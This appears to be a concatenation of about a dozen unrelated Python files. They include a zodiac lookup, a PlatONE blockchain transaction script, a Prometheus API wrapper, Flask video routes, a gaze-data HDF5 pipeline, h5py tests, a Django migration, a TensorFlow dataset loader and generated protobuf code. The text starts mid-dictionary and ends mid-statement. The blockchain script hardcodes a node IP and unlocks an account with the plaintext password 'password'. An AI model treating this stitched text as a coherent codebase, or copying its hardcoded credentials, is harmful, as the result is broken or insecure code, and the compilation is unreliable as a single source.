    (datetime(YEAR, 3, 21), datetime(YEAR, 4, 19)): "牡羊座",
    (datetime(YEAR, 4, 20), datetime(YEAR, 5, 20)): "牡牛座",
    (datetime(YEAR, 5, 21), datetime(YEAR, 6, 21)): "双子座",
    (datetime(YEAR, 6, 22), datetime(YEAR, 7, 22)): "蟹座",
    (datetime(YEAR, 7, 23), datetime(YEAR, 8, 22)): "獅子座",
    (datetime(YEAR, 8, 23), datetime(YEAR, 9, 22)): "乙女座",
    (datetime(YEAR, 9, 23), datetime(YEAR, 10, 23)): "天秤座",
    (datetime(YEAR, 10, 24), datetime(YEAR, 11, 22)): "蠍座",
    (datetime(YEAR, 11, 23), datetime(YEAR, 12, 21)): "射手座",
    (datetime(YEAR, 12, 22), datetime(YEAR, 1, 19)): "山羊座",
}


def judge_zodiac_sign(month, day) -> str:
    target = datetime(YEAR, month, day)
    for (start, end), value in ZODIAC_SIGNS.items():
        if start <= end:
            if start <= target <= end:
                return value
        # 山羊座 wraps around the end of the year (12/22 - 1/19), so its range
        # has to be matched on either side of the New Year.
        elif target >= start or target <= end:
            return value
    return ""


def main():
    fire.Fire({"judge": judge_zodiac_sign})


if __name__ == "__main__":
    main()
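# Usage sketch: judge_zodiac_sign is exposed through python-fire, so it can be called
# from Python or from the command line. The file name "zodiac.py" is an assumption
# made for this illustration.
#
#   $ python zodiac.py judge 3 25
#   牡羊座
from zodiac import judge_zodiac_sign  # hypothetical module name

assert judge_zodiac_sign(3, 25) == "牡羊座"
assert judge_zodiac_sign(1, 1) == "山羊座"  # the wrap-around range around New Year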
from client_sdk_python import Web3, HTTPProvider
from client_sdk_python.eth import PlatONE
from hexbytes import HexBytes

# get blockNumber
# w3 = Web3(HTTPProvider("http://localhost:6789"))
w3 = Web3(HTTPProvider("http://58.251.94.108:56789"))  # node on a chain that supports GM (Chinese national standard) cryptography
platone = PlatONE(w3)
block_number = platone.blockNumber
print(block_number)

# get balance
address = 'lax1yjjzvjph3tw4h2quw6mse25y492xy7fzwdtqja'
balance = platone.getBalance(address)
print(balance)

# send transaction
to = '0xC1f330B214668beAc2E6418Dd651B09C759a4Bf5'
w3.personal.unlockAccount(address, "password", 60)
data = {
    "from": address,
    "to": to,
    "value": 0x10909,
}
transaction_hex = HexBytes(platone.sendTransaction(data)).hex()
result = platone.waitForTransactionReceipt(transaction_hex)
print(result)
#!/usr/bin/env python3 # Copyright 2021 Canonical Ltd. # See LICENSE file for licensing details. import logging from typing import List, Literal import aiohttp from prometheus_api_client import PrometheusConnect logger = logging.getLogger(__name__) class Prometheus: """A class that represents a running instance of Prometheus.""" def __init__(self, host="localhost", port=9090): """Utility to manage a Prometheus application. Args: host: Optional; host address of Prometheus application. port: Optional; port on which Prometheus service is exposed. """ self.base_url = f"http://{host}:{port}" async def is_ready(self) -> bool: """Send a GET request to check readiness. Returns: True if Prometheus is ready (returned 200 OK); False otherwise. """ url = f"{self.base_url}/-/ready" async with aiohttp.ClientSession() as session: async with session.get(url) as response: return response.status == 200 async def config(self) -> str: """Send a GET request to get Prometheus configuration. Returns: YAML config in string format or empty string """ url = f"{self.base_url}/api/v1/status/config" async with aiohttp.ClientSession() as session: async with session.get(url) as response: result = await response.json() return result["data"]["yaml"] if result["status"] == "success" else "" async def rules(self, rules_type: Literal["alert", "record"] = None) -> list: """Send a GET request to get Prometheus rules. Args: rules_type: the type of rules to fetch, or all types if not provided. Returns: Rule Groups list or empty list """ url = f"{self.base_url}/api/v1/rules{'?type=' + rules_type if rules_type else ''}" async with aiohttp.ClientSession() as session: async with session.get(url) as response: result = await response.json() # response looks like this: # {"status":"success","data":{"groups":[]} return result["data"]["groups"] if result["status"] == "success" else [] async def labels(self) -> List[str]: """Send a GET request to get labels. Returns: List of labels """ url = f"{self.base_url}/api/v1/labels" async with aiohttp.ClientSession() as session: async with session.get(url) as response: result = await response.json() # response looks like this: # { # "status": "success", # "data": [ # "__name__", # "alertname", # "alertstate", # ... # "juju_application", # "juju_charm", # "juju_model", # "juju_model_uuid", # ... # "version" # ] # } return result["data"] if result["status"] == "success" else [] async def alerts(self) -> List[dict]: """Send a GET request to get alerts. Returns: List of alerts """ url = f"{self.base_url}/api/v1/alerts" async with aiohttp.ClientSession() as session: async with session.get(url) as response: result = await response.json() # response looks like this: # # { # "status": "success", # "data": { # "alerts": [ # { # "labels": { # "alertname": "AlwaysFiring", # "job": "non_existing_job", # "juju_application": "avalanche-k8s", # "juju_charm": "avalanche-k8s", # "juju_model": "remotewrite", # "juju_model_uuid": "5d2582f6-f8c9-4496-835b-675431d1fafe", # "severity": "High" # }, # "annotations": { # "description": " of job non_existing_job is firing the dummy alarm.", # "summary": "Instance dummy alarm (always firing)" # }, # "state": "firing", # "activeAt": "2022-01-13T18:53:12.808550042Z", # "value": "1e+00" # } # ] # } # } return result["data"]["alerts"] if result["status"] == "success" else [] async def run_promql(self, query: str, disable_ssl: bool = True) -> list: prometheus = PrometheusConnect(url=self.base_url, disable_ssl=disable_ssl) return prometheus.custom_query(query=query)
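# Usage sketch for the Prometheus helper above. The module name "prometheus_helper"
# and the host/port are assumptions for illustration; the wrapper is asyncio-based,
# so its coroutines are driven with asyncio.run().
import asyncio

from prometheus_helper import Prometheus  # hypothetical module name for the class above


async def show_status():
    prom = Prometheus(host="localhost", port=9090)
    if await prom.is_ready():
        print(await prom.labels())
        print(await prom.alerts())
        print(await prom.run_promql("up"))


if __name__ == "__main__":
    asyncio.run(show_status())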
import FWCore.ParameterSet.Config as cms from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer SiStripBaselineValidator = DQMEDAnalyzer('SiStripBaselineValidator', srcProcessedRawDigi = cms.InputTag('siStripZeroSuppression','VirginRaw') )
from flask import request, Blueprint, render_template, redirect

from services.user import UserServices
from services.video import VideoServices

video = Blueprint('video', __name__)


@video.route('/play')
def video_play():
    uid = request.cookies.get('uid')
    if uid is None:
        return redirect('/user/login', 302)
    video_id = request.args.get('video_id')
    us = UserServices()
    vd = VideoServices()
    u_result = us.get_user_info(uid)
    total_time = us.get_user_time(uid)
    vd = vd.get_video_info(video_id)
    return render_template('video/play.html',
                           username=u_result['user_name'],
                           total_time=round(total_time / 60, 1),
                           vd=vd)


@video.route('/list')
def video_list():
    uid = request.cookies.get('uid')
    if uid is None:
        return redirect('/user/login', 302)
    subject_id = request.args.get('sub')
    us = UserServices()
    u_result = us.get_user_info(uid)
    total_time = us.get_user_time(uid)
    vd = VideoServices()
    v_result = vd.get_video_list(subject_id)
    return render_template('video/list.html',
                           course=v_result,
                           username=u_result['user_name'],
                           total_time=round(total_time / 60, 1))


@video.route('/live')
def video_live():
    uid = request.cookies.get('uid')
    live = request.args.get("live")
    if uid is None:
        return redirect('/user/login', 302)
    return render_template("video/live.html", live=live, grade=str(int(live)))
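# Registration sketch (import path and url_prefix are assumptions, not taken from the
# project): the blueprint above only defines relative routes, so the application has
# to register it, e.g. under /video, alongside the user blueprint it redirects to.
from flask import Flask

from routes.video import video  # hypothetical import path

app = Flask(__name__)
app.register_blueprint(video, url_prefix='/video')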
import sys import pandas as pd import os from yaml import safe_load import csv from collections import OrderedDict import cv2 import numpy as np from tqdm import tqdm from subprocess import call import h5py from src.data.data_loaders import load_action_data, load_gaze_data from src.features.feat_utils import transform_images, fuse_gazes_noop sys.path.append(os.path.dirname(os.path.abspath(__file__))) # pylint: disable=all from data_utils import get_game_entries_, process_gaze_data # nopep8 with open('src/config.yaml', 'r') as f: config_data = safe_load(f.read()) RAW_DATA_DIR = config_data['RAW_DATA_DIR'] PROC_DATA_DIR = config_data['PROC_DATA_DIR'] INTERIM_DATA_DIR = config_data['INTERIM_DATA_DIR'] VALID_ACTIONS = config_data['VALID_ACTIONS'] STACK_SIZE = config_data['STACK_SIZE'] CMP_FMT = config_data['CMP_FMT'] OVERWRITE_INTERIM_GAZE = config_data['OVERWRITE_INTERIM_GAZE'] with open(os.path.join(RAW_DATA_DIR, 'action_enums.txt'), 'r') as f: ACTIONS_ENUM = f.read() games = VALID_ACTIONS.keys() def create_interim_files(game='breakout'): valid_actions = VALID_ACTIONS[game] game_runs, game_runs_dirs, game_runs_gazes = get_game_entries_( os.path.join(RAW_DATA_DIR, game)) interim_game_dir = os.path.join(INTERIM_DATA_DIR, game) if not os.path.exists(interim_game_dir): os.makedirs(interim_game_dir) for game_run, game_run_dir, game_run_gaze in tqdm( zip(game_runs, game_runs_dirs, game_runs_gazes)): untar_sting = 'tar -xjf {} -C {}'.format( os.path.join(game_run_dir, game_run) + CMP_FMT, interim_game_dir + '/') untar_args = untar_sting.split(' ') interim_writ_dir = os.path.join(interim_game_dir, game_run) gaze_out_file = '{}/{}_gaze_data.csv'.format(interim_writ_dir, game_run) if os.path.exists(os.path.join(interim_game_dir, game_run)): print("Exists, Skipping {}/{}".format(game_run_dir, game_run)) else: print("Extracting {}/{}".format(game_run_dir, game_run)) call(untar_args) if not os.path.exists(gaze_out_file) or OVERWRITE_INTERIM_GAZE: print("Prepping gaze data for {}/{}".format( game_run_dir, game_run)) gaze_file = os.path.join(game_run_dir, game_run_gaze) process_gaze_data(gaze_file, gaze_out_file, valid_actions) else: print("Exists, Skipping prepping of {}/{}".format( game_run_dir, game_run)) def create_processed_data(stack=1, stack_type='', stacking_skip=0, from_ix=0, till_ix=-1, game='breakout'): game_dir = os.path.join(INTERIM_DATA_DIR, game) game_runs = os.listdir(game_dir) images = [] actions = [] gaze_out_h5_file = os.path.join(PROC_DATA_DIR, game + '.hdf5') gaze_h5_file = h5py.File(gaze_out_h5_file, 'w') for game_run in tqdm(game_runs): print("Creating processed data for ", game, game_run) images_, actions_ = load_action_data(stack, stack_type, stacking_skip, from_ix, till_ix, game, game_run) _, gazes = load_gaze_data(stack, stack_type, stacking_skip, from_ix, till_ix, game, game_run, skip_images=True) images_ = transform_images(images_, type='torch') gazes = fuse_gazes_noop(images_, gazes, actions_, gaze_count=1, fuse_type='stack', fuse_val=1) images_ = images_.numpy() gazes = gazes.numpy() group = gaze_h5_file.create_group(game_run) group.create_dataset('images', data=images_, compression="gzip") group.create_dataset('actions', data=actions_, compression="gzip") group.create_dataset('fused_gazes', data=gazes, compression="gzip") del gazes, images_, actions_ gaze_h5_file.close() def combine_processed_data(game): gaze_out_h5_file = os.path.join(PROC_DATA_DIR, game + '.hdf5') gaze_h5_file = h5py.File(gaze_out_h5_file, 'a') groups = list(gaze_h5_file.keys()) if not 'combined' in 
groups:
        all_group = gaze_h5_file.create_group('combined')
    all_group = gaze_h5_file['combined']
    # Combine the per-run datasets, skipping the 'combined' group itself.
    run_groups = [group for group in groups if group != 'combined']
    data = list(gaze_h5_file[run_groups[0]].keys())
    for datum in tqdm(data):
        max_shape_datum = (sum([
            gaze_h5_file[group][datum].shape[0] for group in run_groups
        ]), *gaze_h5_file[run_groups[0]][datum].shape[1:])
        print(max_shape_datum, datum)
        all_group.create_dataset(datum,
                                 data=gaze_h5_file[run_groups[0]][datum][:],
                                 maxshape=max_shape_datum)
        for group in tqdm(run_groups[1:]):
            # Remember the size before resizing so the new rows are appended after
            # the existing ones instead of being written into an empty slice.
            old_size = all_group[datum].shape[0]
            all_group[datum].resize(
                old_size + gaze_h5_file[group][datum].shape[0], axis=0)
            all_group[datum][old_size:] = gaze_h5_file[group][datum]
    gaze_h5_file.close()


if __name__ == "__main__":
    for game in games:
        create_interim_files(game=game)
        create_processed_data(stack=STACK_SIZE, game=game, till_ix=10)
        combine_processed_data(game)
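# Read-back sketch: combine_processed_data writes one HDF5 file per game with a group
# per run plus a 'combined' group holding the stacked images, actions and fused gaze
# maps. The concrete path below is an assumption; PROC_DATA_DIR comes from the
# project's config.yaml.
import h5py

with h5py.File('data/processed/breakout.hdf5', 'r') as f:  # hypothetical path
    combined = f['combined']
    print(combined['images'].shape,
          combined['actions'].shape,
          combined['fused_gazes'].shape)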
from __future__ import with_statement """ Test highlevel Group object behavior """ import numpy as np import h5py from common import TestCasePlus, api_16, api_18, res from common import dump_warnings SHAPES = [(), (1,), (10,5), (1,10), (10,1), (100,1,100), (51,2,1025)] class GroupBase(TestCasePlus): """ Base class to handle Group setup/teardown, and some shared logic. """ def setUp(self): self.f = h5py.File(res.get_name(), 'w') def tearDown(self): res.clear() def assert_equal_contents(self, a, b): """ Check if two iterables contain the same elements, regardless of order. """ self.assertEqual(set(a), set(b)) self.assertEqual(len(a), len(b)) ## ----- from h5py import Group, Dataset, Datatype, File import numpy class TestOther(GroupBase): def test_require(self): grp = self.f.require_group('foo') self.assert_(isinstance(grp, Group)) self.assert_('foo' in self.f) grp2 = self.f.require_group('foo') self.assert_(grp == grp2) self.assert_(hash(grp) == hash(grp2)) dset = self.f.require_dataset('bar', (10,10), '<i4') self.assert_(isinstance(dset, Dataset)) self.assert_('bar' in self.f) dset2 = self.f.require_dataset('bar', (10,10), '<i4') self.assert_(dset == dset2) self.assert_(hash(dset) == hash(dset2)) self.assertRaises(TypeError, self.f.require_group, 'bar') self.assertRaises(TypeError, self.f.require_dataset, 'foo', (10,10), '<i4') self.assertRaises(TypeError, self.f.require_dataset, 'bar', (10,11), '<i4') self.assertRaises(TypeError, self.f.require_dataset, 'bar', (10,10), '<c8') self.assertRaises(TypeError, self.f.require_dataset, 'bar', (10,10), '<i1', exact=True) self.f.require_dataset('bar', (10,10), '<i1') @api_16 def test_copy_16(self): self.f.create_group('foo') self.assertRaises(NotImplementedError, self.f.copy, 'foo', 'bar') @api_18 def test_copy_18(self): self.f.create_group('foo') self.f.create_group('foo/bar') self.f.copy('foo', 'new') self.assert_('new' in self.f) self.assert_('new/bar' in self.f)
#!/usr/bin/env python3 from librip.gens import gen_random from librip.iterators import Unique data1 = [1, 1, 1, 1, 1, 2, 2, 2, 2, 2] data2 = ['A', 'a', 'b', 'B'] data3 = ['A', 'a', 'b', 'B'] # Реализация задания 2 for i in Unique(data1): print(i, end=" ") print(" ") for i in Unique(data2): print(i, end=" ") print(" ") for i in Unique(data3, ignore_case=True): print(i, end=" ") print(" ")
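# librip.iterators.Unique is part of the exercise and is not shown here. A minimal
# sketch of one possible implementation, matching how it is used above (lazy
# iteration, optional ignore_case keyword), could look like this; the real class may
# differ.
class UniqueSketch:
    def __init__(self, items, **kwargs):
        self._iter = iter(items)
        self._ignore_case = kwargs.get('ignore_case', False)
        self._seen = set()

    def __iter__(self):
        return self

    def __next__(self):
        for item in self._iter:
            key = item.lower() if self._ignore_case and isinstance(item, str) else item
            if key not in self._seen:
                self._seen.add(key)
                return item
        raise StopIteration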
# Generated by Django 2.2.1 on 2019-08-28 09:17 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Student', fields=[ ('id', models.AutoField(primary_key=True, serialize=False)), ('user_name', models.CharField(max_length=50)), ('first_name', models.CharField(max_length=50)), ('last_name', models.CharField(max_length=50)), ('email', models.EmailField(blank=True, max_length=70)), ('advisor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), ]
import typing import tensorflow as tf FEATURES = [ "fixed_acidity", "volatile_acidity", "citric_acid", "residual_sugar", "chlorides", "free_sulfur_dioxide", "total_sulfur_dioxide", "density", "pH", "sulphates", "alcohol" ] LABEL = "quality" def get_train_eval_datasets( path: str, train_fraction: float = 0.7 ) -> typing.Tuple[tf.data.Dataset, tf.data.Dataset]: def split_label(*row): return dict(zip(FEATURES, row)), row[-1] def in_training_set(*row): num_buckets = 1000 key = tf.string_join(list(map(tf.as_string, row))) bucket_id = tf.string_to_hash_bucket_fast(key, num_buckets) return bucket_id < int(train_fraction * num_buckets) def in_test_set(*row): return ~in_training_set(*row) data = tf.contrib.data.CsvDataset( path, [tf.float32] * len(FEATURES) + [tf.int32], header=True, field_delim=";") train = data.filter(in_training_set).map(split_label).cache() test = data.filter(in_test_set).map(split_label).cache() return train, test def get_feature_columns(): return [tf.feature_column.numeric_column(name) for name in FEATURES] def get_n_classes(): return 10
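# Usage sketch (TF 1.x style, matching the tf.contrib API used above): the dataset
# helpers plug into a canned DNNClassifier. The module name "wine_data", the CSV path
# and the hyperparameters are illustrative assumptions, not taken from the project.
import tensorflow as tf

from wine_data import (get_train_eval_datasets, get_feature_columns,
                       get_n_classes)  # hypothetical module name

CSV_PATH = "winequality-white.csv"  # hypothetical path


def train_input_fn():
    train, _ = get_train_eval_datasets(CSV_PATH)
    return train.shuffle(1000).batch(32).repeat().make_one_shot_iterator().get_next()


def eval_input_fn():
    _, test = get_train_eval_datasets(CSV_PATH)
    return test.batch(32).make_one_shot_iterator().get_next()


estimator = tf.estimator.DNNClassifier(hidden_units=[32, 16],
                                       feature_columns=get_feature_columns(),
                                       n_classes=get_n_classes())
estimator.train(train_input_fn, steps=1000)
print(estimator.evaluate(eval_input_fn))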
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: karps/proto/computation.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf.internal import enum_type_wrapper from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database from google.protobuf import descriptor_pb2 # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() from karps.proto import graph_pb2 as karps_dot_proto_dot_graph__pb2 from karps.proto import row_pb2 as karps_dot_proto_dot_row__pb2 from tensorflow.core.framework import node_def_pb2 as tensorflow_dot_core_dot_framework_dot_node__def__pb2 DESCRIPTOR = _descriptor.FileDescriptor( name='karps/proto/computation.proto', package='karps.core', syntax='proto3', serialized_pb=_b('\n\x1dkarps/proto/computation.proto\x12\nkarps.core\x1a\x17karps/proto/graph.proto\x1a\x15karps/proto/row.proto\x1a(tensorflow/core/framework/node_def.proto\"\xfd\x01\n\x11\x43omputationResult\x12$\n\nlocal_path\x18\x01 \x01(\x0b\x32\x10.karps.core.Path\x12(\n\x06status\x18\x02 \x01(\x0e\x32\x18.karps.core.ResultStatus\x12\x13\n\x0b\x66inal_error\x18\x03 \x01(\t\x12.\n\x0c\x66inal_result\x18\x04 \x01(\x0b\x32\x18.karps.core.CellWithType\x12+\n\x0bspark_stats\x18\x05 \x01(\x0b\x32\x16.karps.core.SparkStats\x12&\n\x0c\x64\x65pendencies\x18\x06 \x03(\x0b\x32\x10.karps.core.Path\"o\n\x16\x42\x61tchComputationResult\x12%\n\x0btarget_path\x18\x01 \x01(\x0b\x32\x10.karps.core.Path\x12.\n\x07results\x18\x02 \x03(\x0b\x32\x1d.karps.core.ComputationResult\"c\n\x0bPointerPath\x12.\n\x0b\x63omputation\x18\x01 \x01(\x0b\x32\x19.karps.core.ComputationId\x12$\n\nlocal_path\x18\x02 \x01(\x0b\x32\x10.karps.core.Path\"\xde\x01\n\nSparkStats\x12%\n\x08rdd_info\x18\x01 \x03(\x0b\x32\x13.karps.core.RDDInfo\x12\'\n\x06parsed\x18\x02 \x03(\x0b\x32\x17.karps.core.SQLTreeInfo\x12)\n\x08\x61nalyzed\x18\x03 \x03(\x0b\x32\x17.karps.core.SQLTreeInfo\x12*\n\toptimized\x18\x04 \x03(\x0b\x32\x17.karps.core.SQLTreeInfo\x12)\n\x08physical\x18\x05 \x03(\x0b\x32\x17.karps.core.SQLTreeInfo\"p\n\x07RDDInfo\x12\x0e\n\x06rdd_id\x18\x01 \x01(\x03\x12\x12\n\nclass_name\x18\x02 \x01(\t\x12\x0c\n\x04repr\x18\x03 \x01(\t\x12\x0f\n\x07parents\x18\x04 \x03(\x03\x12\"\n\x05proto\x18\x05 \x01(\x0b\x32\x13.tensorflow.NodeDef\"k\n\x0bSQLTreeInfo\x12\x0f\n\x07node_id\x18\x01 \x01(\t\x12\x11\n\tfull_name\x18\x02 \x01(\t\x12\x14\n\x0cparent_nodes\x18\x03 \x03(\t\x12\"\n\x05proto\x18\x04 \x01(\x0b\x32\x13.tensorflow.NodeDef\"\x1b\n\rComputationId\x12\n\n\x02id\x18\x01 \x01(\t\"\x17\n\tSessionId\x12\n\n\x02id\x18\x01 \x01(\t*b\n\x0cResultStatus\x12\n\n\x06UNUSED\x10\x00\x12\x0b\n\x07RUNNING\x10\x01\x12\x14\n\x10\x46INISHED_SUCCESS\x10\x02\x12\x14\n\x10\x46INISHED_FAILURE\x10\x03\x12\r\n\tSCHEDULED\x10\x04\x62\x06proto3') , dependencies=[karps_dot_proto_dot_graph__pb2.DESCRIPTOR,karps_dot_proto_dot_row__pb2.DESCRIPTOR,tensorflow_dot_core_dot_framework_dot_node__def__pb2.DESCRIPTOR,]) _RESULTSTATUS = _descriptor.EnumDescriptor( name='ResultStatus', full_name='karps.core.ResultStatus', filename=None, file=DESCRIPTOR, values=[ _descriptor.EnumValueDescriptor( name='UNUSED', index=0, number=0, options=None, type=None), _descriptor.EnumValueDescriptor( name='RUNNING', index=1, number=1, options=None, type=None), _descriptor.EnumValueDescriptor( name='FINISHED_SUCCESS', index=2, number=2, options=None, type=None), 
_descriptor.EnumValueDescriptor( name='FINISHED_FAILURE', index=3, number=3, options=None, type=None), _descriptor.EnumValueDescriptor( name='SCHEDULED', index=4, number=4, options=None, type=None), ], containing_type=None, options=None, serialized_start=1107, serialized_end=1205, ) _sym_db.RegisterEnumDescriptor(_RESULTSTATUS) ResultStatus = enum_type_wrapper.EnumTypeWrapper(_RESULTSTATUS) UNUSED = 0 RUNNING = 1 FINISHED_SUCCESS = 2 FINISHED_FAILURE = 3 SCHEDULED = 4 _COMPUTATIONRESULT = _descriptor.Descriptor( name='ComputationResult', full_name='karps.core.ComputationResult', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='local_path', full_name='karps.core.ComputationResult.local_path', index=0, number=1, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='status', full_name='karps.core.ComputationResult.status', index=1, number=2, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='final_error', full_name='karps.core.ComputationResult.final_error', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='final_result', full_name='karps.core.ComputationResult.final_result', index=3, number=4, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='spark_stats', full_name='karps.core.ComputationResult.spark_stats', index=4, number=5, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='dependencies', full_name='karps.core.ComputationResult.dependencies', index=5, number=6, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=136, serialized_end=389, ) _BATCHCOMPUTATIONRESULT = _descriptor.Descriptor( name='BatchComputationResult', full_name='karps.core.BatchComputationResult', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='target_path', full_name='karps.core.BatchComputationResult.target_path', index=0, number=1, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='results', full_name='karps.core.BatchComputationResult.results', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], 
enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=391, serialized_end=502, ) _POINTERPATH = _descriptor.Descriptor( name='PointerPath', full_name='karps.core.PointerPath', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='computation', full_name='karps.core.PointerPath.computation', index=0, number=1, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='local_path', full_name='karps.core.PointerPath.local_path', index=1, number=2, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=504, serialized_end=603, ) _SPARKSTATS = _descriptor.Descriptor( name='SparkStats', full_name='karps.core.SparkStats', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='rdd_info', full_name='karps.core.SparkStats.rdd_info', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='parsed', full_name='karps.core.SparkStats.parsed', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='analyzed', full_name='karps.core.SparkStats.analyzed', index=2, number=3, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='optimized', full_name='karps.core.SparkStats.optimized', index=3, number=4, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='physical', full_name='karps.core.SparkStats.physical', index=4, number=5, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=606, serialized_end=828, ) _RDDINFO = _descriptor.Descriptor( name='RDDInfo', full_name='karps.core.RDDInfo', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='rdd_id', full_name='karps.core.RDDInfo.rdd_id', index=0, number=1, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='class_name', full_name='karps.core.RDDInfo.class_name', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), 
message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='repr', full_name='karps.core.RDDInfo.repr', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='parents', full_name='karps.core.RDDInfo.parents', index=3, number=4, type=3, cpp_type=2, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='proto', full_name='karps.core.RDDInfo.proto', index=4, number=5, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=830, serialized_end=942, ) _SQLTREEINFO = _descriptor.Descriptor( name='SQLTreeInfo', full_name='karps.core.SQLTreeInfo', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='node_id', full_name='karps.core.SQLTreeInfo.node_id', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='full_name', full_name='karps.core.SQLTreeInfo.full_name', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='parent_nodes', full_name='karps.core.SQLTreeInfo.parent_nodes', index=2, number=3, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='proto', full_name='karps.core.SQLTreeInfo.proto', index=3, number=4, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=944, serialized_end=1051, ) _COMPUTATIONID = _descriptor.Descriptor( name='ComputationId', full_name='karps.core.ComputationId', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='id', full_name='karps.core.ComputationId.id', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=1053, serialized_end=1080, ) _SESSIONID = 